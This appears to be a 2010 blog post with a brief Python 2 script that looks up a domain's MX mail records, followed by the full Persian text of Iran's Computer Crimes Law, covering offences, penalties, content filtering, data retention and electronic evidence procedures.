Tuesday, December 14, 2010

simple py script for mx query

import dns.resolver
site = raw_input("enter site name\n--->")
rec = dns.resolver.query(site, 'MX')
for rdata in rec:
    print 'Host', rdata.exchange, 'has preference', rdata.preference
      

متن کامل قانون جرائم رایانه ای

 

بخش یکم ـ جرائم و مجازات
فصل یکم ـ جرائم علیه محرمانگی داده ها و سیستم های رایانهای و مخابراتی
مبحث یکم ـ دسترسی غیرمجاز
ماده (1) هرکس به طور غیرمجاز به داده ها یا سیستم های رایانه ای یا مخابراتی که به وسیله تدابیر امنیتی حفاظت شده است دسترسی یابد، به حبس از نود و یک روز تا یک سال یا جزای نقدی از پنج تا بیست میلیون ریال یا هر دو مجازات محکوم خواهد شد.
مبحث دوم ـ شنود غیرمجاز
ماده (2) هرکس به طور غیرمجاز محتوای در حال انتقال ارتباطات غیرعمومی در سیستم های رایانه ای یا مخابراتی یا امواج الکترومغناطیسی یا نوری را شنود کند، به حبس از شش ماه تا دو سال یا جزای نقدی از ده تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
مبحث سوم ـ جاسوسی رایانه ای
ماده (3) هرکس به طور غیرمجاز نسبت به داده های سری در حال انتقال یا ذخیره شده در سیستم های رایانه ای یا مخابراتی یا حامل های داده مرتکب اعمال زیر شود، به مجازات های مقرر محکوم خواهد شد:
الف) دسترسی به داده های مذکور یا تحصیل آنها یا شنود محتوای سری در حال انتقال، به حبس از یک تا سه سال یا جزای نقدی از بیست تا شصت میلیون ریال یا هر دو مجازات.
ب) در دسترس قرار دادن داده های مذکور برای اشخاص فاقد صلاحیت، به حبس از دو تا ده سال.
ج) افشا یا در دسترس قرار دادن داده های مذکور برای دولت، سازمان، شرکت یا گروه بیگانه یا عاملان آنها، به حبس از پنج تا پانزده سال.
تبصره 1ـ داده های سری داده هایی است که افشای آنها به امنیت کشور یا منافع ملی لطمه میزند.
تبصره 2ـ آئین نامه نحوه تعیین و تشخیص داده های سری و نحوه طبقه بندی و حفاظت آن ها ظرف سه ماه از تاریخ تصویب این قانون توسط وزارت اطلاعات با همکاری وزارتخانه های دادگستری، کشور، ارتباطات و فناوری اطلاعات و دفاع و پشتیبانی نیروهای مسلح تهیه و به تصویب هیئت دولت خواهد رسید.
ماده (4) هرکس به قصد دسترسی به داده های سری موضوع ماده (3) این قانون، تدابیر امنیتی سیستم های رایانه ای یا مخابراتی را نقض کند، به حبس از شش ماه تا دو سال یا جزای نقدی از ده تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
ماده (5) چنانچه مأموران دولتی که مسؤول حفظ داده های سری مقرر در ماده (3) این قانون یا سیستم های مربوط هستند و به آنها آموزش لازم داده شده است یا داده ها یا سیستم های مذکور در اختیار آنها قرار گرفته است بر اثر بی احتیاطی، بی مبالاتی یا عدم رعایت تدابیر امنیتی موجب دسترسی اشخاص فاقد صلاحیت به داده ها، حامل های داده یا سیستمlهای مذکور شوند، به حبس از نود و یک روز تا دو سال یا جزای نقدی از پنج تا چهل میلیون ریال یا هر دو مجازات و انفصال از خدمت از شش ماه تا دو سال محکوم خواهند شد.
فصل دوم ـ جرائم علیه صحت و تمامیت داده ها و سیستم های رایانه ای و مخابراتی
مبحث یکم ـ جعل رایانه ای
ماده (6) هرکس به طور غیرمجاز مرتکب اعمال زیر شود، جاعل محسوب و به حبس از یک تا پنج سال یا جزای نقدی از بیست تا یکصد میلیون ریال یا هر دو مجازات محکوم خواهد شد:
الف) تغییر داده های قابل استناد یا ایجاد یا وارد کردن متقلبانة داده ها،
ب) تغییر داده ها یا علایم موجود در کارت های حافظه یا قابل پردازش در سیستم های رایانه ای یا مخابراتی یا تراشه ها یا ایجاد یا وارد کردن متقلبانة داده ها یا علایم به آنها.
ماده (7) هرکس با علم به مجعول بودن داده ها یا کارت ها یا تراشه ها از آنها استفاده کند، به مجازات مندرج در ماده فوق محکوم خواهد شد.
مبحث دوم ـ تخریب و اخلال در داده ها یا سیستم های رایانه ای و مخابراتی
ماده (8) هر کس به طور غیرمجاز داده های دیگری را از سیستم های رایانه ای یا مخابراتی یا حامل های داده حذف یا تخریب یا مختل یا غیرقابل پردازش کند به حبس از شش ماه تا دو سال یا جزای نقدی از ده تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
ماده (9) هر کس به طور غیرمجاز با انجام اعمالی از قبیل وارد کردن، انتقال دادن، پخش، حذف کردن، متوقف کردن، دستکاری یا تخریب داده ها یا امواج الکترومغناطیسی یا نوری، سیستم های رایانه ای یا مخابراتی دیگری را از کار بیندازد یا کارکرد آنها را مختل کند، به حبس از شش ماه تا دو سال یا جزای نقدی از ده تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
ماده (10) هرکس به طور غیرمجاز با انجام اعمالی از قبیل مخفی کردن داده ها، تغییر گذرواژه یا رمزنگاری داده ها مانع دسترسی اشخاص مجاز به داده ها یا سیستم های رایانه ای یا مخابراتی شود، به حبس از نود و یک روز تا یک سال یا جزای نقدی از پنج تا بیست میلیون ریال یا هر دو مجازات محکوم خواهد شد.
ماده (11) هرکس به قصد به خطر انداختن امنیت یا آسایش عمومی اعمال مذکور در مواد (8)، (9) و (10) این قانون را علیه سیستم های رایانه ای و مخابراتی که برای ارائة خدمات ضروری عمومی به کار می روند، از قبیل خدمات درمانی، آب، برق، گاز، مخابرات، حمل و نقل و بانکداری مرتکب شود، به حبس از سه تا ده سال محکوم خواهد شد.
فصل سوم ـ سرقت و کلاهبرداری مرتبط با رایانه
ماده (12) هرکس به طور غیرمجاز داده های متعلق به دیگری را برباید، چنانچه عین داده ها در اختیار صاحب آن باشد، به جزای نقدی از یک تا بیست میلیون ریال و در غیر این صورت به حبس از نود و یک روز تا یک سال یا جزای نقدی از پنج تا بیست میلیون ریال یا هر دو مجازات محکوم خواهد شد.
ماده (١٣) هرکس به طور غیرمجاز از سیستم های رایانه ای یا مخابراتی با ارتکاب اعمالی از قبیل وارد کردن، تغییر، محو، ایجاد یا متوقف کردن داده ها یا مختل کردن سیستم وجه یا مال یا منفعت یا خدمات یا امتیازات مالی برای خود یا دیگری تحصیل کند علاوه بر رد مال به صاحب آن به حبس از یک تا پنج سال یا جزای نقدی از بیست تا یکصد میلیون ریال یا هر دو مجازات محکوم خواهد شد.
فصل چهارم ـ جرایم علیه عفت و اخلاق عمومی
ماده (١٤) هرکس به وسیله سیستم های رایانه ای یا مخابراتی یا حامل های داده محتویات مستهجن را تولید، ارسال، منتشر، توزیع یا معامله کند یا به قصد ارسال یا انتشار یا تجارت تولید یا ذخیره یا نگهداری کند، به حبس از نود و یک روز تا دو سال یا جزای نقدی از پنج تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
تبصره 1 ـ ارتکاب اعمال فوق در خصوص محتویات مبتذل موجب محکومیت به حداقل یکی از مجازات های فوق می شود. محتویات وآثار مبتذل به آثاری اطلاق می گردد که دارای صحنه ها وصور قبیحه باشد.
تبصره 2 ـ هرگاه محتویات مستهجن به کمتر از ده نفر ارسال شود، مرتکب به یک تا پنج میلیون ریال جزای نقدی محکوم خواهد شد.
تبصره 3 ـ چنانچه مرتکب اعمال مذکور در این ماده را حرفة خود قرار داده باشد یا بطور سازمان یافته مرتکب شود چنانچه مفسد فی الارض شناخته نشود، به حداکثر هر دو مجازات مقرر در این ماده محکوم خواهد شد.
تبصره 4 ـ محتویات مستهجن به تصویر، صوت یا متن واقعی یا غیرواقعی اطلاق می شود که بیانگر برهنگی کامل زن یا مرد یا اندام تناسلی یا آمیزش یا عمل جنسی انسان است.
ماده (١٥) هرکس از طریق سیستم های رایانه ای یا مخابراتی یا حامل های داده مرتکب اعمال زیر شود، به ترتیب زیر مجازات خواهد شد:
الف) چنانچه به منظور دستیابی افراد به محتویات مستهجن، آنها را تحریک یا ترغیب یا تهدید یا تطمیع کند یا فریب دهد یا شیوه دستیابی به آنها را تسهیل کند یا آموزش دهد، به حبس از نود و یک روز تا یک سال یا جزای نقدی از پنج تا بیست میلیون ریال یا هر دو مجازات.ارتکاب این اعمال در خصوص محتویات مبتذل موجب جزای نقدی از دو تا پنج میلیون ریال است.
ب) چنانچه افراد را به ارتکاب جرائم منافی عفت یا استعمال مواد مخدر یا روان گردان یا خودکشی یا انحرافات جنسی یا اعمال خشونت آمیز تحریک یا ترغیب یا تهدید یا دعوت کند یا فریب دهد یا شیوه ارتکاب یا استعمال آنها را تسهیل کند یا آموزش دهد، به حبس از نود و یک روز تا یک سال یا جزای نقدی از پنج تا بیست میلیون ریال یا هر دو مجازات. تبصره ـ مفاد این ماده و ماده (١٤) شامل آن دسته از محتویاتی نخواهد شد که برای مقاصد علمی یا هر مصلحت عقلایی دیگر تهیه یا تولید یا نگهداری یا ارائه یا توزیع یا انتشار یا معامله می شود.
فصل پنجم ـ هتک حیثیت و نشر اکاذیب
ماده (16) هرکس به وسیله سیستم های رایانه ای یا مخابراتی، فیلم یا صوت یا تصویر دیگری را تغییر دهد یا تحریف کند و آن را منتشر یا با علم به تغییر یا تحریف منتشر کند، به نحوی که عرفاً موجب هتک حیثیت او شود، به حبس از نود و یک روز تا دو سال یا جزای نقدی از پنج تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
تبصره ـ چنانچه تغییر یا تحریف به صورت مستهجن باشد، مرتکب به حداکثر هر دو مجازات مقرر محکوم خواهد شد.
ماده (17) هرکس به وسیله سیستم های رایانه ای یا مخابراتی صوت یا تصویر یا فیلم خصوصی یا خانوادگی یا اسرار دیگری را بدون رضایت او منتشر کند یا در دسترس دیگران قرار دهد، به نحوی که منجر به ضرر یا عرفاً موجب هتک حیثیت او شود، به حبس از نود و یک روز تا دو سال یا جزای نقدی از پنج تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
ماده (18) هر کس به قصد اضرار به غیر یا تشویش اذهان عمومی یا مقامات رسمی به وسیله سیستم رایانه یا مخابراتی اکاذیبی را منتشر نماید یا در دسترس دیگران قرار دهد یا با همان مقاصد اعمالی را برخلاف حقیقت، رأساً یا به عنوان نقل قول، به شخص حقیقی یا حقوقی یا مقام های رسمی به طور صریح یا تلویحی نسبت دهد، اعم از این که از طریق یاد شده به نحوی از انحاء ضرر مادی یا معنوی به دیگری وارد شود یا نشود، افزون بر اعاده حیثیت به حبس از نود و یک روز تا دو سال یا جزای نقدی از پنج تا چهل میلیون ریال یا هر دو مجازات محکوم خواهد شد.
فصل ششم ـ مسئولیت کیفری اشخاص
ماده (١٩) در موارد زیر، چنانچه جرایم رایانه ای به نام شخص حقوقی و در راستای منافع آن ارتکاب یابد، شخص حقوقی دارای مسئولیت کیفری خواهد بود:
الف) هرگاه مدیر شخص حقوقی مرتکب جرم رایانه ای شود.
ب) هرگاه مدیر شخص حقوقی دستور ارتکاب جرم رایانه ای را صادر کند و جرم بوقوع پیوندد.
ج) هرگاه یکی از کارمندان شخص حقوقی با اطلاع مدیر یا در اثر عدم نظارت وی مرتکب جرم رایانه ای شود.
د) هرگاه تمام یا قسمتی از فعالیت شخص حقوقی به ارتکاب جرم رایانه ای اختصاص یافته باشد.
تبصره ١ـ منظور از مدیر کسی است که اختیار نمایندگی یا تصمیم گیری یا نظارت بر شخص حقوقی را دارد.
تبصره ٢ـ مسئولیت کیفری شخص حقوقی مانع مجازات مرتکب نخواهد بود.
ماده (٢٠) اشخاص حقوقی موضوع ماده فوق، با توجه به شرایط و اوضاع و احوال جرم ارتکابی، میزان درآمد و نتایج حاصله از ارتکاب جرم، علاوه بر سه تا شش برابر حداکثر جزای نقدی جرم ارتکابی، به ترتیب ذیل محکوم خواهند شد:
الف) چنانچه حداکثر مجازات حبس آن جرم تا پنج سال حبس باشد، تعطیلی موقت شخص حقوقی از یک تا نُه ماه و در صورت تکرار جرم تعطیلی موقت شخص حقوقی از یک تا پنج سال.
ب) چنانچه حداکثر مجازات حبس آن جرم بیش از پنج سال حبس باشد، تعطیلی موقت شخص حقوقی از یک تا سه سال و در صورت تکرار جرم شخص حقوقی منحل خواهد شد.
تبصره ١ـ مدیر شخص حقوقی که طبق بند ب این ماده منحل می شود، تا سه سال حق تأسیس یا نمایندگی یا تصمیم گیری یا نظارت بر شخص حقوقی دیگری را نخواهد داشت.
تبصره ٢ـ خسارات شاکی خصوصی از اموال شخص حقوقی جبران خواهد شد. در صورتی که اموال شخص حقوقی به تنهایی تکافو نکند، مابه التفاوت از اموال مرتکب جبران خواهد شد.
ماده (٢١) ارائه دهندگان خدمات دسترسی موظفند طبق ضوابط فنی و فهرست مقرر از سوی کمیتة تعیین مصادیق موضوع ماده ذیل محتوای مجرمانه اعم از محتوای ناشی از جرایم رایانه ای و محتوایی که برای ارتکاب جرایم رایانه ای بکار می رود را پالایش کنند. در صورتی که عمداً از پالایش محتوای مجرمانه خودداری کنند، منحل خواهند شد و چنانچه از روی بی احتیاطی و بی مبالاتی زمینة دسترسی به محتوای غیرقانونی را فراهم آورند، در مرتبة نخست به جزای نقدی از بیست تا یکصد میلیون ریال و در مرتبة دوم به جزای نقدی از یکصد میلیون تا یک میلیارد ریال و در مرتبة سوم به یک تا سه سال تعطیلی موقت محکوم خواهند شد.
تبصره :چنانچه محتوای مجرمانه به وبسایت های مؤسسات عمومی شامل نهادهای زیرنظر ولی فقیه و قوای سه گانة مقننه، مجریه و قضائیه و مؤسسات عمومی غیردولتی موضوع قانون فهرست نهادها و مؤسسات عمومی غیردولتی مصوب 19/4/1373 و الحاقات بعدی آن یا به احزاب، جمعیت ها، انجمن های سیاسی و صنفی و انجمن های اسلامی یا اقلیت های دینی شناخته شده یا به سایر اشخاص حقیقی یا حقوقی حاضر در ایران که امکان احراز هویت و ارتباط با آنها وجود دارد تعلق داشته باشد، با دستور مقام قضایی رسیدگی کننده به پرونده و رفع اثر فوری محتوای مجرمانه از سوی دارندگان، وب سایت مزبور تا صدور حکم نهایی پالایش نخواهد شد.
تبصره پالایش محتوای مجرمانه موضوع شکایت خصوصی با دستور مقام قضایی رسیدگی کننده به پرونده انجام خواهد شد.
ماده (22) قوة قضائیه موظف است ظرف یک ماه از تاریخ تصویب این قانون کمیته تعیین مصادیق محتوای مجرمانه را در محل دادستانی کل کشور تشکیل دهد. وزیر یا نمایندة وزارتخانه های آموزش و پرورش، ارتباطات و فناوری اطلاعات، اطلاعات، دادگستری، علوم،تحقیقات و فناوری، فرهنگ و ارشاد اسلامی، رئیس سازمان تبلیغات اسلامی، رئیس سازمان صدا و سیما و فرمانده نیروی انتظامی، یک نفر خبره در فناوری اطلاعات و ارتباطات به انتخاب کمیسیون صنایع و معادن مجلس شورای اسلامی و یک نفر نمایندة مجلس شورای اسلامی به انتخاب کمیسیون حقوقی و قضایی و تأیید مجلس شورای اسلامی اعضای کمیته را تشکیل خواهند داد. ریاست کمیته به عهدة دادستان کل کشور خواهد بود.
تبصره 1- جلسات کمیته حداقل هر پانزده روز یک بار و با حضور هفت نفر عضو دارای حق رأی رسمیت می یابد و تصمیمات کمیته با اکثریت نسبی حاضران معتبر خواهد بود.
تبصره 2- کمیته موظف است به شکایات راجع به مصادیق پالایش شده رسیدگی و نسبت به آنها تصمیم گیری کند. رأی کمیته قطعی است.
تبصره 3- کمیته موظف است هر شش ماه گزارشی در خصوص روند پالایش محتوای مجرمانه را به رؤسای قوای سه گانه و شورای عالی امنیت ملی تقدیم کند.
ماده (٢3) ارائه دهندگان خدمات میزبانی موظفند به محض دریافت دستور کمیته تعیین مصادیق مذکور در مادة فوق یا مقام قضایی رسیدگی کننده به پرونده مبنی بر وجود محتوای مجرمانه در سیستم های رایانه ای خود از ادامة دسترسی به آن ممانعت به عمل آورند. چنانچه عمداً از اجرای دستور کمیته یا مقام قضایی خودداری کنند، منحل خواهند شد. در غیر این صورت، چنانچه در اثر بی احتیاطی و بی مبالاتی زمینه دسترسی به محتوای مجرمانه مزبور را فراهم کنند، در مرتبه نخست به جزای نقدی از بیست تا یکصد میلیون ریال و در مرتبة دوم به یکصد میلیون تا یک میلیارد ریال و در مرتبة سوم به یک تا سه سال تعطیلی موقت محکوم خواهند شد.
تبصره ـ ارائه دهندگان خدمات میزبانی موظفند به محض آگاهی از وجود محتوای مجرمانه مراتب به کمیتة تعیین مصادیق اطلاع دهند.
ماده (٢4) هرکس بدون مجوز قانونی از پهنای باند بین المللی برای برقراری ارتباطات مخابراتی مبتنی بر پروتکل اینترنتی از خارج ایران به داخل یا برعکس استفاده کند, به حبس از یک تا سه سال یا جزای نقدی از یکصد میلیون تا یک میلیارد ریال یا هر دو مجازات محکوم خواهد شد.
فصل هفتم ـ سایر جرائم
ماده (25) هرکس مرتکب اعمال زیر شود، به حبس از نود و یک روز تا یک سال یا جزای نقدی از پنج تا بیست میلیون ریال یا هر دو مجازات محکوم خواهد شد:
الف) تولید یا انتشار یا توزیع یا معامله داده ها یا نرم افزارها یا هر نوع ابزار الکترونیکی که صرفاً به منظور ارتکاب جرائم رایانه ای به کار می روند.
ب) فروش یا انتشار یا در دسترس قرار دادن گذرواژه یا هر داده ای که امکان دسترسی غیرمجاز به داده ها یا سیستم های رایانه ای یا مخابراتی متعلق به دیگری را فراهم می کند.
ج) آموزش نحوة ارتکاب جرایم دسترسی غیرمجاز، شنود غیرمجاز، جاسوسی رایانه ای و تخریب و اخلال در داده ها یا سیستم های رایانه ای و مخابراتی.
تبصره ـ چنانچه مرتکب اعمال یاد شده را حرفه خود قرار داده باشد، به حداکثر هر دو مجازات مقرر در این ماده محکوم خواهد شد.
فصل هشتم ـ تشدید مجازات ها
ماده (2٦) در موارد زیر، حسب مورد مرتکب به بیش از دوسوم حداکثر یک یا دو مجازات مقرر محکوم خواهد شد:
الف) هر یک از کارمندان و کارکنان اداره ها و سازمان
ها یا شوراها و یا شهرداری ها و موسسه ها و شرکت های دولتی و یا وابسته به دولت یا نهادهای انقلابی و بنیادها و مؤسسه هایی که زیر نظر ولی فقیه اداره می شوند و دیوان محاسبات و مؤسسه هایی که با کمک مستمر دولت اداره میشوند و یا دارندگان پایه قضایی و به طور کلی اعضا و کارکنان قوای سه گانه و همچنین نیروهای مسلح و مأموران به خدمت عمومی اعم از رسمی و غیررسمی به مناسبت انجام وظیفه مرتکب جرم رایانه ای شده باشند.
ب) متصدی یا متصرف قانونی شبکه های رایانه ای یا مخابراتی که به مناسبت شغل خود مرتکب جرم رایانه ای شده باشد.
ج) داده ها یا سیستم های رایانه ای یا مخابراتی، متعلق به دولت یا نهادها و مراکز ارایه دهنده خدمات عمومی باشد.
د) جرم به صورت سازمان یافته ارتکاب یافته باشد.
هـ) جرم در سطح گسترده ای ارتکاب یافته باشد.
ماده (٢٧) در صورت تکرار جرم برای بیش از دو بار دادگاه می تواند مرتکب را از خدمات الکترونیکی عمومی از قبیل اشتراک اینترنت، تلفن همراه، اخذ نام دامنه مرتبه بالای کشوری و بانکداری الکترونیکی محروم کند:
الف) چنانچه مجازات حبس آن جرم نود و یک روز تا دو سال حبس باشد، محرومیت از یک ماه تا یک سال.
ب) چنانچه مجازات حبس آن جرم دو تا پنج سال حبس باشد، محرومیت از یک تا سه سال.
ج) چنانچه مجازات حبس آن جرم بیش از پنج سال حبس باشد، محرومیت از سه تا پنج سال.
بخش دوم ـ آیین دادرسی
فصل یکم صلاحیت
ماده (٢٨) علاوه بر موارد پیش بینی شده در دیگر قوانین، دادگاه های ایران در موارد زیر نیز صالح به رسیدگی خواهند بود:
الف) داده های مجرمانه یا داده هایی که برای ارتکاب جرم به کار رفته اند به هر نحو در سیستم های رایانه ای و مخابراتی یا حامل های دادة موجود در قلمرو حاکمیت زمینی، دریایی و هوایی جمهوری اسلامی ایران ذخیره شده باشد.
ب) جرم از طریق وب سایت های دارای دامنه مرتبه بالای کد کشوری ایران ارتکاب یافته باشد.
ج) جرم توسط هر ایرانی یا غیرایرانی در خارج از ایران علیه سیستم های رایانه ای و مخابراتی و وب سایت های مورد استفاده یا تحت کنترل قوای سه گانه یا نهاد رهبری یا نمایندگی های رسمی دولت یا هر نهاد یا مؤسسه ای که خدمات عمومی ارائه می دهد یا علیه وب سایت های دارای دامنة مرتبه بالای کد کشوری ایران در سطح گسترده ارتکاب یافته باشد.
د) جرایم رایانه ای متضمن سوء استفاده از اشخاص کمتر از ١٨ سال، اعم از آنکه مرتکب یا بزه دیده ایرانی یا غیرایرانی باشد.
ماده (29) چنانچه جرم رایانه ای در محلی کشف یا گزارش شود،ولی محل وقوع آن معلوم نباشد، دادسرای محل کشف مکلف است تحقیقات مقدماتی را انجام دهد. چنانچه محل وقوع جرم مشخص نشود، دادسرا پس از اتمام تحقیقات مبادرت به صدور قرار می کند و دادگاه مربوط نیز رأی مقتضی را صادر خواهد کرد.
ماده (30) قوه قضاییه موظف است به تناسب ضرورت شعبه یا شعبی از دادسراها، دادگاه های عمومی و انقلاب، نظامی و تجدیدنظر را برای رسیدگی به جرائم رایانه ای اختصاص دهد.
تبصره ـ قضات دادسراها و دادگاه های مذکور از میان قضاتی که آشنایی لازم به امور رایانه دارند انتخاب خواهند شد.
ماده (٣١) در صورت بروز اختلاف در صلاحیت، حل اختلاف مطابق مقررات قانون آیین دادرسی دادگاه های عمومی و انقلاب در امور مدنی خواهد بود.
فصل دوم ـ جمع آوری ادله الکترونیکی
مبحث اول ـ نگهداری داده ها
ماده (32) ارائه دهندگان خدمات دسترسی موظفند داده های ترافیک را حداقل تا شش ماه پس از ایجاد و اطلاعات کاربران را حداقل تا شش ماه پس از خاتمه اشتراک نگهداری کنند.
تبصره 1ـ داده ترافیک هرگونه داده ای است که سیستم های رایانه ای در زنجیره ارتباطات رایانه ای و مخابراتی تولید می کنند تا امکان ردیابی آنها از مبداء تا مقصد وجود داشته باشد. این داده ها شامل اطلاعاتی از قبیل مبداء، مسیر، تاریخ، زمان، مدت و حجم ارتباط و نوع خدمات مربوطه می شود.
تبصره 2ـ اطلاعات کاربر هرگونه اطلاعات راجع به کاربر خدمات دسترسی از قبیل نوع خدمات، امکانات فنی مورد استفاده و مدت زمان آن، هویت، آدرس جغرافیایی یا پستی یا IP، شماره تلفن و سایر مشخصات فردی اوست.
ماده (٣3) ارائه دهندگان خدمات میزبانی داخلی موظفند اطلاعات کاربران خود را حداقل تا شش ماه پس از خاتمه اشتراک و محتوای ذخیره شده و داده ترافیک حاصل از تغییرات ایجاد شده را حداقل تا پانزده روز نگهداری کنند.
مبحث دوم ـ حفظ فوری داده های رایانه ای ذخیره شده
ماده (٣4) هرگاه حفظ داده های رایانه ای ذخیره شده برای تحقیق یا دادرسی لازم باشد، مقام قضایی می تواند دستور حفاظت از آنها را برای اشخاصی که به نحوی تحت تصرف یا کنترل دارند صادر کند. در شرایط فوری، نظیر خطر آسیب دیدن یا تغییر یا از بین رفتن داده ها، ضابطان قضایی می توانند رأساً دستور حفاظت را صادر کنند و مراتب را حداکثر تا 24 ساعت به اطلاع مقام قضایی برسانند. چنانچه هر یک از کارکنان دولت یا ضابطان قضایی یا سایر اشخاص از اجرای این دستور خودداری یا داده های حفاظت شده را افشا کنند یا اشخاصی که داده های مزبور به آنها مربوط می شود را از مفاد دستور صادره آگاه کنند، ضابطان قضایی و کارکنان دولت به مجازات امتناع از دستور مقام قضایی و سایر اشخاص به حبس از نود و یک روز تا شش ماه یا جزای نقدی از پنج تا ده میلیون ریال یا هر دو مجازات محکوم خواهند شد.
تبصره 1ـ حفظ داده ها به منزله ارائه یا افشای آن ها نبوده و مستلزم رعایت مقررات مربوط است.
تبصره 2ـ مدت زمان حفاظت از داده ها حداکثر سه ماه است و در صورت لزوم با دستور مقام قضایی قابل تمدید است.
مبحث سوم ـارائه داده ها
ماده (٣5) مقام قضایی می تواند دستور ارائة داده های حفاظت شده مذکور در مواد (٣٢)، (٣٣) و (٣٤) فوق را به اشخاص یاد شده بدهد تا در اختیار ضابطان قرار گیرد. مستنکف از اجرای این دستور به مجازات مقرر در ماده (٣٤) محکوم خواهد شد.
مبحث چهارم ـ تفتیش و توقیف داده ها و سیستم های رایانه ای و مخابراتی
ماده (٣6) تفتیش و توقیف داده ها یا سیستم های رایانه ای و مخابراتی به موجب دستور قضایی و در مواردی به عمل می آید که ظن قوی به کشف جرم یا شناسایی متهم یا ادله جرم وجود داشته باشد.
ماده (٣7) تفتیش و توقیف داده ها یا سیستم های رایانه ای و مخابراتی در حضور متصرفان قانونی یا اشخاصی که به نحوی آنها را تحت کنترل قانونی دارند، نظیر متصدیان سیستم ها انجام خواهد شد. در غیر این صورت، قاضی با ذکر دلایل دستور تفتیش و توقیف بدون حضور اشخاص مذکور را صادر خواهد کرد.
ماده (٣8) دستور تفتیش و توقیف باید شامل اطلاعاتی باشد که به اجرای صحیح آن کمک می کند، از جمله اجرای دستور در محل یا خارج از آن، مشخصات مکان و محدوده تفتیش و توقیف، نوع و میزان داده های مورد نظر، نوع و تعداد سخت افزارها و نرم افزارها، نحوه دستیابی به داده های رمزنگاری یا حذف شده و زمان تقریبی انجام تفتیش و توقیف.
ماده (39) تفتیش داده ها یا سیستم های رایانه ای و مخابراتی شامل اقدامات ذیل می شود:
الف) دسترسی به تمام یا بخشی از سیستم های رایانه ای یا مخابراتی.
ب) دسترسی به حامل های داده از قبیل دیسکت ها یا لوح های فشرده یا کارت های حافظه.
ج) دستیابی به داده های حذف یا رمزنگاری شده.
ماده (40) در توقیف داده ها، با رعایت تناسب، نوع، اهمیت و نقش آنها در ارتکاب جرم، به روش هایی از قبیل چاپ داده ها، کپی برداری یا تصویربرداری از تمام یا بخشی از داده ها، غیرقابل دسترس کردن داده ها با روش هایی از قبیل تغییر گذرواژه یا رمزنگاری و ضبط حامل های داده عمل می شود.
ماده (41) در شرایط زیر سیستم های رایانه ای یا مخابراتی توقیف خواهند شد:
الف) داده های ذخیره شده به سهولت در دسترسی نبوده یا حجم زیادی داشته باشد،
ب) تفتیش و تجزیه و تحلیل داده ها بدون سیستم سخت افزاری امکان پذیر نباشد،
ج) متصرف قانونی سیستم رضایت داده باشد،
د) کپی برداری از داده ها به لحاظ فنی امکان پذیر نباشد،
هـ) تفتیش در محل باعث آسیب داده ها شود،
و) سایر شرایطی که قاضی تشخیص دهد.
ماده (42) توقیف سیستم های رایانه ای یا مخابراتی متناسب با نوع و اهمیت و نقش آنها در ارتکاب جرم با روش هایی از قبیل تغییر گذرواژه به منظور عدم دسترسی به سیستم، پلمپ سیستم در محل استقرار و ضبط سیستم صورت می گیرد.
ماده (43) چنانچه در حین اجرای دستور تفتیش و توقیف، تفتیش داده های مرتبط با جرم ارتکابی در سایر سیستم های رایانه ای یا مخابراتی که تحت کنترل یا تصرف متهم قرار دارند ضروری باشد، ضابطان با دستور مقام قضایی دامنه تفتیش و توقیف را به سیستم های دیگر گسترش خواهند داد و داده های مورد نظر را تفتیش یا توقیف خواهند کرد.
ماده (44) توقیف داده ها یا سیستم های رایانه ای یا مخابراتی که موجب ایراد لطمه جانی یا خسارات مالی شدید به اشخاص یا اخلال در ارائه خدمات عمومی می شود ممنوع است.
ماده (45) در جایی که اصل داده ها توقیف می شود ذی نفع حق دارد پس از پرداخت هزینه از آنها کپی دریافت کند، مشروط به اینکه ارائه داده های توقیف شده منافی با محرمانه بودن تحقیقات نباشد و به روند تحقیقات لطمه ای وارد نسازد و داده ها مجرمانه نباشند.
ماده (46) در مواردی که اصل داده ها یا سیستم های رایانه ای یا مخابراتی توقیف می شود، قاضی موظف است با لحاظ نوع و میزان داده ها و نوع و تعداد سخت افزارها و نرم افزارهای مورد نظر و نقش آنها در جرم ارتکابی، در مهلت متناسب و متعارف نسبت به آنها تعیین تکلیف کند.
ماده (47) متضرر می تواند در مورد عملیات و اقدام های مأموران در توقیف داده ها و سیستم های رایانه ای و مخابراتی، اعتراض کتبی خود را همراه با دلایل ظرف ده روز به مرجع قضایی دستوردهنده تسلیم نماید. به درخواست یاد شده خارج از نوبت رسیدگی گردیده و تصمیم اتخاذ شده قابل اعتراض است.
مبحث پنجم ـ شنود محتوای ارتباطات رایانه ای
ماده (48) شنود محتوای در حال انتقال ارتباطات غیرعمومی در سیستم های رایانه ای یا مخابراتی مطابق مقررات راجع به شنود مکالمات تلفنی خواهد بود.
تبصره ـ دسترسی به محتوای ارتباطات غیرعمومی ذخیره شده، نظیر پست الکترونیکی یا پیامک در حکم شنود و مستلزم رعایت مقررات مربوط است.
فصل سوم ـ استنادپذیری ادله الکترونیکی
ماده (49) به منظور حفظ صحت و تمامیت، اعتبار و انکارناپذیری ادله الکترونیکی جمع آوری شده، لازم است مطابق آیین نامه مربوط از آنها نگهداری و مراقبت به عمل آید.
ماده (50) چنانچه داده های رایانه ای توسط طرف دعوا یا شخص ثالثی که از دعوا آگاهی نداشته، ایجاد یا پردازش یا ذخیره یا منتقل شده باشد و سیستم رایانه ای یا مخابراتی مربوط به نحوی درست عمل کند که به صحت و تمامیت، اعتبار و انکارناپذیری داده ها خدشه وارد نشده باشد، قابل استناد خواهند بود.
ماده (51) کلیة مقررات مندرج در فصل های دوم و سوم این بخش، علاوه بر جرایم رایانه ای شامل سایر جرایمی که ادلة الکترونیکی در آنها مورد استناد قرار می گیرند نیز می شود.
بخش سوم ـ سایر مقررات
ماده (٥2) به منظور ارتقای همکاری های بین المللی در زمینه جرائم رایانه ای، وزارت دادگستری موظف است با همکاری وزارت ارتباطات و فناوری اطلاعات اقدامات لازم را در زمینه تدوین لوایح و پیگیری امور مربوط جهت پیوستن ایران به اسناد بین المللی و منطقه ای و معاهدات راجع به همکاری و معاضدت دوجانبه یا چندجانبه قضایی انجام دهد.
ماده (53) در مواردی که سیستم رایانه ای یا مخابراتی به عنوان وسیله ارتکاب جرم بکار رفته و در این قانون برای عمل مزبور مجازاتی پیش بینی نشده است، مطابق قوانین جزایی مربوط عمل خواهد شد.
